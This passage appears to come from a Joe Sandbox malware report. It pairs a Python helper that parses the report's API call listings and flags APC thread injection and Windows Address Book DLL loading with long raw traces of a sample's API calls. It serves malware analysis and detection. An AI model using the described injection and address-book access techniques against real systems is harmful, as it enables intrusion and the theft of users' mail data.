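The two listings above are the most telling in this part of the report: CreateToolhelp32Snapshot with flag 4 (TH32CS_SNAPTHREAD), a Thread32First/Thread32Next walk, OpenThread with access mask 0x1F03FF (THREAD_ALL_ACCESS) and QueueUserAPC on each handle is thread-walking APC injection, and RegOpenKeyA on 0x80000002 (HKEY_LOCAL_MACHINE) Software\Microsoft\WAB\DLLPath followed by LoadLibraryA and GetProcAddress resolves the Windows Address Book DLL by the path Windows registers for it, the route a program takes to address-book data without hard-coding the DLL location. The Python below is an added example, not part of this Joe Sandbox report and not Joe Sandbox's own code: it parses blocks in exactly the "APIs" format shown on this page, decodes the hex arguments whose values carry the verdict (the tables hold the documented Win32 constants), and matches multi-call sequences in address order. The rule labels, the function names and the trimmed SAMPLE excerpt (constructed from the two blocks above) are this example's own.

```python
"""Triage helper for the Joe Sandbox "APIs" blocks on this page (added example; not part of the
report or of Joe Sandbox). It parses the per-function call listings, decodes the hex arguments that
carry the verdict (access masks, allocation flags, registry hives) and flags call sequences that are
the observable shape of a technique. Constants are documented Win32 values; labels are this example's own."""
import re

# API lines: "• Api.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function ADDR:".
API_LINE = re.compile(r"^\s*•\s*(?:Part of subcall function ([0-9A-F]+):\s*)?"
                      r"([A-Za-z_]\w*)\.([A-Z0-9]+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-F]+)\s*$")
OPCODE_LINE = re.compile(r"^\s*•\s*Opcode ID:\s*([0-9a-f]{64})\s*$")
STRING_LINE = re.compile(r"^\s*•\s*(.+), xrefs: [0-9A-F]+\s*$")
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")   # '?' and '-00000005' style tokens stay raw

ENUMS = {  # exact-value arguments, keyed by (api, zero-based argument index)
    ("RegOpenKeyA", 0): {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"},
    ("VirtualAlloc", 3): {0x2: "PAGE_READONLY", 0x4: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"},
}
FLAGS = {  # bitmask arguments; entries are tried in order, so a combined mask must come first
    ("CreateToolhelp32Snapshot", 0): [("TH32CS_SNAPPROCESS", 0x2), ("TH32CS_SNAPTHREAD", 0x4)],
    # 0x1F03FF is THREAD_ALL_ACCESS as defined for _WIN32_WINNT < 0x0600, the value in this sample
    ("OpenThread", 0): [("THREAD_ALL_ACCESS", 0x1F03FF), ("SYNCHRONIZE", 0x100000),
                        ("THREAD_SET_CONTEXT", 0x10), ("THREAD_GET_CONTEXT", 0x8), ("THREAD_TERMINATE", 0x1)],
    ("VirtualAlloc", 2): [("MEM_COMMIT", 0x1000), ("MEM_RESERVE", 0x2000)],
}

def decode_arg(api, index, raw):
    """Symbolic form of one argument, or the raw token when nothing is known about that position."""
    if not HEX_ARG.match(raw):              # the report prints '?' for values it could not recover
        return raw
    value, key = int(raw, 16), (api, index)
    if key in ENUMS:
        return ENUMS[key].get(value, raw)
    names, remaining = [], value
    for name, mask in FLAGS.get(key, []):
        if remaining & mask == mask:
            names.append(name)
            remaining &= ~mask
    if names and remaining:                 # bits no table entry explains stay visible
        names.append(f"0x{remaining:X}")
    return "|".join(names) if names else raw

def parse_report(text):
    """One dict per "APIs" section: its calls (own and subcall), strings and Opcode ID."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"opcode_id": "", "calls": [], "strings": []}
            blocks.append(cur)
        elif cur is None:
            continue
        elif (m := API_LINE.match(line)):
            sub, api, _module, args, ref = m.groups()
            cur["calls"].append({"api": api, "ref": int(ref, 16), "subcall": bool(sub),
                                 "args": [a.strip() for a in args.split(",")] if args else []})
        elif (m := OPCODE_LINE.match(line)):
            cur["opcode_id"] = m.group(1)
        elif (m := STRING_LINE.match(line)):
            cur["strings"].append(m.group(1))
    return blocks

RULES = [  # (label, APIs that must occur in this order among the function's own calls, required string)
    ("APC injection into every thread of a target process",
     ["CreateToolhelp32Snapshot", "Thread32First", "OpenThread", "QueueUserAPC"], ""),
    ("Windows Address Book DLL loaded via its registry DLLPath (mail data access)",
     ["RegOpenKeyA", "LoadLibraryA", "GetProcAddress"], r"Software\Microsoft\WAB\DLLPath"),
]

def find_patterns(blocks):
    """(opcode_id, label) per matching block; own calls are sorted by address first, because the
    listing is not in call order (RegCloseKey at 045692A6 is printed before LoadLibraryA above)."""
    hits = []
    for b in blocks:
        own = [c["api"] for c in sorted(b["calls"], key=lambda c: c["ref"]) if not c["subcall"]]
        seen = b["strings"] + [a for c in b["calls"] for a in c["args"]]
        for label, required, needle in RULES:
            pos = [own.index(api) for api in required if api in own]
            if len(pos) == len(required) and pos == sorted(pos) and (not needle or needle in seen):
                hits.append((b["opcode_id"], label))
    return hits

# Constructed input: the two blocks copied from this report, trimmed to the lines the rules need.
SAMPLE = r"""APIs
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0457AE97
• Thread32First.KERNEL32(00000001,0000001C), ref: 0457AECE
• OpenThread.KERNEL32(001F03FF,00000000,00000000), ref: 0457AEE9
• QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 0457AEFA
• Opcode ID: dc875a0f29311dc3c0d666eda68321579a212fcfbfe14a4513526837620cc4b2
APIs
• RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 045691EE
• RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 045692A6
  • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
• LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 0456923C
• GetProcAddress.KERNEL32(00000000,?), ref: 04569255
• Software\Microsoft\WAB\DLLPath, xrefs: 045691DF
• Opcode ID: 9b40639c099986215c090c65e090d230a1440a151dc8daf518ad89b5e5701648
"""

if __name__ == "__main__":
    print(*find_patterns(parse_report(SAMPLE)), sep="\n")
```

Run against the text of this section instead of SAMPLE, the same two Opcode IDs are the only hits: no other function here contains all four injection calls, and the WAB key string occurs in one block only. Two choices matter in practice: calls are sorted by their ref address before sequence matching, since the report prints them in a different order, and unexplained flag bits are kept rather than dropped, so a Vista-style mask of 0x1FFFFF decodes to THREAD_ALL_ACCESS|0xFC00 instead of being mislabelled.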

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL ref: 0456DB87
                                                            • memset.NTDLL ref: 0456DB9B
                                                              • Part of subcall function 045768B2: RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                              • Part of subcall function 045768B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                              • Part of subcall function 045768B2: RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                              • Part of subcall function 045768B2: RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            • GetCurrentThreadId.KERNEL32 ref: 0456DC28
                                                            • GetCurrentThread.KERNEL32 ref: 0456DC3B
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 0456DCE2
                                                            • Sleep.KERNEL32(0000000A), ref: 0456DCEC
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 0456DD12
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0456DD40
                                                            • HeapFree.KERNEL32(00000000,00000018), ref: 0456DD53
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                                            • String ID:
                                                            • API String ID: 1146182784-0
                                                            • Opcode ID: d95eeff696ec9354a5afef0beee50ca72dff808c73ab833959a2d51789798b0d
                                                            • Instruction ID: 705b5b937da907142630f4355be25fe035fd085e48c769c3ce39a0237b9a570e
                                                            • Opcode Fuzzy Hash: d95eeff696ec9354a5afef0beee50ca72dff808c73ab833959a2d51789798b0d
                                                            • Instruction Fuzzy Hash: 6A510BB1604245AFE721DF65E88091ABBF8FB88344F405D2EF585E7250DB34ED4CAB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04574211: RtlEnterCriticalSection.NTDLL(0458C328), ref: 04574219
                                                              • Part of subcall function 04574211: RtlLeaveCriticalSection.NTDLL(0458C328), ref: 0457422E
                                                              • Part of subcall function 04574211: InterlockedIncrement.KERNEL32(0000001C), ref: 04574247
                                                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04582F42
                                                            • memset.NTDLL ref: 04582F53
                                                            • lstrcmpi.KERNEL32(?,?), ref: 04582F93
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04582FBF
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04582FD3
                                                            • memset.NTDLL ref: 04582FE0
                                                            • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 04582FF9
                                                            • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 0458301C
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04583039
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                                            • String ID:
                                                            • API String ID: 694413484-0
                                                            • Opcode ID: e6db525d6b95d951fb41feae9300ded972cc976af86cdb1517f385e9953bd760
                                                            • Instruction ID: 8a809769550089f73f28bac1fcf0ef62687cf61f50fa604daa086412deb4b757
                                                            • Opcode Fuzzy Hash: e6db525d6b95d951fb41feae9300ded972cc976af86cdb1517f385e9953bd760
                                                            • Instruction Fuzzy Hash: 5441AF71E0020AEFDB109FA5DC84A9D7BB9FB04718F14846DF905B7251DB39AE09EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000008,00000008,?,?,?), ref: 0457DFFD
                                                            • lstrlen.KERNEL32(?,?,?), ref: 0457E005
                                                            • lstrlen.KERNEL32(00000001,?,?), ref: 0457E070
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457E09B
                                                            • memcpy.NTDLL(00000000,00000002,?,?,?), ref: 0457E0AC
                                                            • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?), ref: 0457E0C2
                                                            • memcpy.NTDLL(00000000,00000001,00000001,00000000,00000000,00000000,?,?,?,?,?), ref: 0457E0D4
                                                            • memcpy.NTDLL(00000000,045863D8,00000002,00000000,00000001,00000001,00000000,00000000,00000000,?,?,?,?,?), ref: 0457E0E7
                                                            • memcpy.NTDLL(00000000,?,00000002,?,?,?,?,?), ref: 0457E0FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy$lstrlen$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 3386453358-0
                                                            • Opcode ID: c3a9338958a358cfc44d614fc03c8518b3080be3242756cf6286ed8403647a35
                                                            • Instruction ID: d59fc983227beec101486b4fdccbf7588d7a6dd0218bec6c98fc9e90d83ca967
                                                            • Opcode Fuzzy Hash: c3a9338958a358cfc44d614fc03c8518b3080be3242756cf6286ed8403647a35
                                                            • Instruction Fuzzy Hash: CD414F71D0031AEFCF00DFA8DC85A9EBBB9FF44254F1444A9E915A7201E771EA54EB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001), ref: 0457C3D5
                                                            • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 0457C3DF
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457C408
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457C416
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457C424
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457C432
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457C440
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457C44E
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?), ref: 0457C4F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad$AllocFreeHeap
                                                            • String ID:
                                                            • API String ID: 356845663-0
                                                            • Opcode ID: 31f4e5c3fe8e3e27a7a95d41aabdc7f0b6eb9bc2c715468483987ec1015cae12
                                                            • Instruction ID: 21081f3adc9d0cb2cd065d4c4492fbe6602930d9d8e43db9cb40843f3eef8654
                                                            • Opcode Fuzzy Hash: 31f4e5c3fe8e3e27a7a95d41aabdc7f0b6eb9bc2c715468483987ec1015cae12
                                                            • Instruction Fuzzy Hash: 43413971900219EFDB11EFA8E8C4D5A77F9FB08304F1155AAE605F7280DA78FD48AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04574211: RtlEnterCriticalSection.NTDLL(0458C328), ref: 04574219
                                                              • Part of subcall function 04574211: RtlLeaveCriticalSection.NTDLL(0458C328), ref: 0457422E
                                                              • Part of subcall function 04574211: InterlockedIncrement.KERNEL32(0000001C), ref: 04574247
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04580F0A
                                                            • lstrlen.KERNEL32(00000008,?,?,?,04563273,?,00000000,73B76900,00000000), ref: 04580F19
                                                            • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 04580F2B
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,04563273,?,00000000,73B76900,00000000), ref: 04580F3B
                                                            • memcpy.NTDLL(00000000,?,?,?,?,?,04563273,?,00000000,73B76900,00000000), ref: 04580F4D
                                                            • lstrcpy.KERNEL32 ref: 04580F7F
                                                            • RtlEnterCriticalSection.NTDLL(0458C328), ref: 04580F8B
                                                            • RtlLeaveCriticalSection.NTDLL(0458C328), ref: 04580FE3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3746371830-0
                                                            • Opcode ID: 3cfbde572c8654196f349974ad06281936e8dbd4a9e9ed6f1975682abeca2ec0
                                                            • Instruction ID: ca3ba4f7396f007403a6a67673bf89293038d0caf0ebde8e07e556fe50d8572b
                                                            • Opcode Fuzzy Hash: 3cfbde572c8654196f349974ad06281936e8dbd4a9e9ed6f1975682abeca2ec0
                                                            • Instruction Fuzzy Hash: 9E417971500705EFDB22AF68E844B5A7BF8FB48B15F11841DF805A7281DF74E958EB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04579F80: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04579FB2
                                                              • Part of subcall function 04579F80: HeapFree.KERNEL32(00000000,00000000,?,?,04568FA2,?,00000022,?,?,?,?,?,?,?,?,?), ref: 04579FD7
                                                              • Part of subcall function 0457DF48: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,04576098,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0457DF84
                                                              • Part of subcall function 0457DF48: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,04576098,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0457DFD7
                                                            • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,00000022,00000000,00000000,00000000), ref: 045760CD
                                                            • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,00000022,00000000,00000000,00000000), ref: 045760D5
                                                            • lstrlen.KERNEL32(?), ref: 045760DF
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 045760F4
                                                            • wsprintfA.USER32 ref: 04576130
                                                            • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0457614F
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04576164
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04576171
                                                            • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0457617F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                                            • String ID:
                                                            • API String ID: 168057987-0
                                                            • Opcode ID: 5a506bea4e7dc3547e247725dcdf5a7a707d6b3ed47c3bbf647fed5f4072f1b2
                                                            • Instruction ID: 6d0c409930fb19baaf0fd07ba477f32e7761f1b39222cad79a231f007d28f96e
                                                            • Opcode Fuzzy Hash: 5a506bea4e7dc3547e247725dcdf5a7a707d6b3ed47c3bbf647fed5f4072f1b2
                                                            • Instruction Fuzzy Hash: A1319071600316ABDB21AF65EC44E5FBBE8FF84354F010529F544A2292DF74EC18EBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,0457F1B3,00000000,0457F1B4,00000080,00000000,00000000,04584C6A,00000000,0457F1B3,?), ref: 0457537E
                                                            • GetLastError.KERNEL32 ref: 04575388
                                                            • WaitForSingleObject.KERNEL32(000000C8), ref: 045753AD
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 045753CE
                                                            • SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 045753F6
                                                            • WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 0457540B
                                                            • SetEndOfFile.KERNEL32(00000001), ref: 04575418
                                                            • GetLastError.KERNEL32 ref: 04575424
                                                            • CloseHandle.KERNEL32(00000001), ref: 04575430
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                                            • String ID:
                                                            • API String ID: 2864405449-0
                                                            • Opcode ID: c762c9996f0a81f8cf5ef22155967fc82d7f9790e43fdba582c560da42b3e8c9
                                                            • Instruction ID: 1bda23fe0f666c37d4ef027a7d7192d10b85836123a302ee2e6ea2fe7f00ca36
                                                            • Opcode Fuzzy Hash: c762c9996f0a81f8cf5ef22155967fc82d7f9790e43fdba582c560da42b3e8c9
                                                            • Instruction Fuzzy Hash: A0319C7190020DFBEF108FA4ED49BAE7BB9FB00315F204168F910E60E0E7B49A54EB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,0457428F,00000008,?,00000010,00000001,00000000,0000003A), ref: 0456FF48
                                                            • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 0456FF7C
                                                            • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 0456FF84
                                                            • GetLastError.KERNEL32 ref: 0456FF8E
                                                            • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0456FFAA
                                                            • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 0456FFC3
                                                            • CancelIo.KERNEL32(?), ref: 0456FFD8
                                                            • CloseHandle.KERNEL32(?), ref: 0456FFE8
                                                            • GetLastError.KERNEL32 ref: 0456FFF0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                                            • String ID:
                                                            • API String ID: 4263211335-0
                                                            • Opcode ID: 5966ec79b88acba9aa972f138bb92060cba2135f30d5c32cd0c7624748d5a6a7
                                                            • Instruction ID: 90bc6c26bb13791ee19e1324432739f9f49b93de3e72c74112aa4a7cf3ca66c5
                                                            • Opcode Fuzzy Hash: 5966ec79b88acba9aa972f138bb92060cba2135f30d5c32cd0c7624748d5a6a7
                                                            • Instruction Fuzzy Hash: 35214F32901218FFDB119FA8F8489DEBB79FB49351F00842AF916E7141DB749A44EBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04572283,00000000,73BCF5B0,0456824E,?,00000001), ref: 045781DD
                                                            • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 045781F3
                                                            • _snwprintf.NTDLL ref: 04578218
                                                            • CreateFileMappingW.KERNEL32(000000FF,0458C1A8,00000004,00000000,00001000,?), ref: 04578234
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04578246
                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0457825D
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 0457827E
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04578286
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                            • String ID:
                                                            • API String ID: 1814172918-0
                                                            • Opcode ID: 33091376c52e67a715864c600c4eec68c3f10b479f9ed2ef67f465b1afcf3799
                                                            • Instruction ID: 682085073c46eeb43752b90bfd94e72a87e5dc67f9ac8140d893a403fd8bffae
                                                            • Opcode Fuzzy Hash: 33091376c52e67a715864c600c4eec68c3f10b479f9ed2ef67f465b1afcf3799
                                                            • Instruction Fuzzy Hash: C821A172640604FBDB11ABA4EC09F8E77B9BB84751F244025FA01F72C0EE74A904AB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 045770E2
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04577105
                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 0457710D
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 04577158
                                                            • memcpy.NTDLL(00000000,?,00000008,00000006), ref: 045771C0
                                                            • LocalFree.KERNEL32(?,00000006), ref: 045771D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                                            • String ID: P
                                                            • API String ID: 3649579052-3110715001
                                                            • Opcode ID: 947076c8108211b7b0518a36c1c4b9707a237770be5923671eabe806632ed61f
                                                            • Instruction ID: 78c28f77585861c9c7b9742311bc1277554e3171b4adc732cc66b1c58228d043
                                                            • Opcode Fuzzy Hash: 947076c8108211b7b0518a36c1c4b9707a237770be5923671eabe806632ed61f
                                                            • Instruction Fuzzy Hash: 2361297190020AAFDF119FA5FC84DAE7BB8FF48748F054029F515B7250DB35BA09AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04581736: RegCreateKeyA.ADVAPI32(80000001,049BA7F0,?), ref: 0458174B
                                                              • Part of subcall function 04581736: lstrlen.KERNEL32(049BA7F0,00000000,00000000,00000000,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?,04575AB0), ref: 04581774
                                                            • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04570E73
                                                            • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04570E8B
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570EED
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04570F01
                                                            • WaitForSingleObject.KERNEL32(00000000,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F53
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F7C
                                                            • HeapFree.KERNEL32(00000000,04572333,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F8C
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                                            • String ID:
                                                            • API String ID: 3503961013-0
                                                            • Opcode ID: 91ccd500bd9f962960119c61fbe7fa7b2a5e9ff0949907046d8fce9151c610ea
                                                            • Instruction ID: 93fba88f4c14c7f603d42733c68980e1d6416efc7465c0736ebfefebe444dee6
                                                            • Opcode Fuzzy Hash: 91ccd500bd9f962960119c61fbe7fa7b2a5e9ff0949907046d8fce9151c610ea
                                                            • Instruction Fuzzy Hash: FD41C571C00109EFDF119F95EC848EEBBB9FB08344F50946AE514B2251DB35AE99EF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • StrChrA.SHLWAPI(00000000,0000002C,7656D3B0,00000000,00000000,04575ADA), ref: 0456F8C6
                                                            • StrChrA.SHLWAPI(00000001,0000002C), ref: 0456F8D9
                                                            • StrTrimA.SHLWAPI(00000000,?), ref: 0456F8FC
                                                            • StrTrimA.SHLWAPI(00000001,?), ref: 0456F90B
                                                            • lstrlen.KERNEL32(00000000), ref: 0456F940
                                                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0456F953
                                                            • lstrcpy.KERNEL32(00000004,00000000), ref: 0456F971
                                                            • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 0456F995
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 1974185407-0
                                                            • Opcode ID: aa8721e48028074db601f17174c307ac6f6cb92165ce7927df9cb8d382d3ea22
                                                            • Instruction ID: b4e11b6667816739ca7026babc5c85d5559a18adc3320b6506c0c1931ae68c49
                                                            • Opcode Fuzzy Hash: aa8721e48028074db601f17174c307ac6f6cb92165ce7927df9cb8d382d3ea22
                                                            • Instruction Fuzzy Hash: ED31BF76900209FFDB119FA9EC84EAE7FB8FF05744F14505AF905A7200EB78A944EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0456C142
                                                            • wsprintfA.USER32 ref: 0456C16A
                                                            • lstrlen.KERNEL32(00000008), ref: 0456C179
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            • wsprintfA.USER32 ref: 0456C1B9
                                                            • wsprintfA.USER32 ref: 0456C1EE
                                                            • memcpy.NTDLL(00000000,?,?), ref: 0456C1FB
                                                            • memcpy.NTDLL(00000008,045863D8,00000002,00000000,?,?), ref: 0456C210
                                                            • wsprintfA.USER32 ref: 0456C233
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                                            • String ID:
                                                            • API String ID: 2937943280-0
                                                            • Opcode ID: bce6ed14c01495bd409210bcad286befe348d058b30042235b71518d52e110b3
                                                            • Instruction ID: e6c17e821801adfc2e3511bf47402b21f0b67b6b6735b95bc977b62e3584839f
                                                            • Opcode Fuzzy Hash: bce6ed14c01495bd409210bcad286befe348d058b30042235b71518d52e110b3
                                                            • Instruction Fuzzy Hash: DD412E71A00209EFDB01DFA9D884EAAB7FCFF44308B144459F95AE7211EA35FE159B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0457A2FF,?,?,?,?), ref: 0457BDF0
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0457BE02
                                                            • wcstombs.NTDLL ref: 0457BE10
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0457A2FF,?,?,?,?,?), ref: 0457BE34
                                                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0457BE49
                                                            • mbstowcs.NTDLL ref: 0457BE56
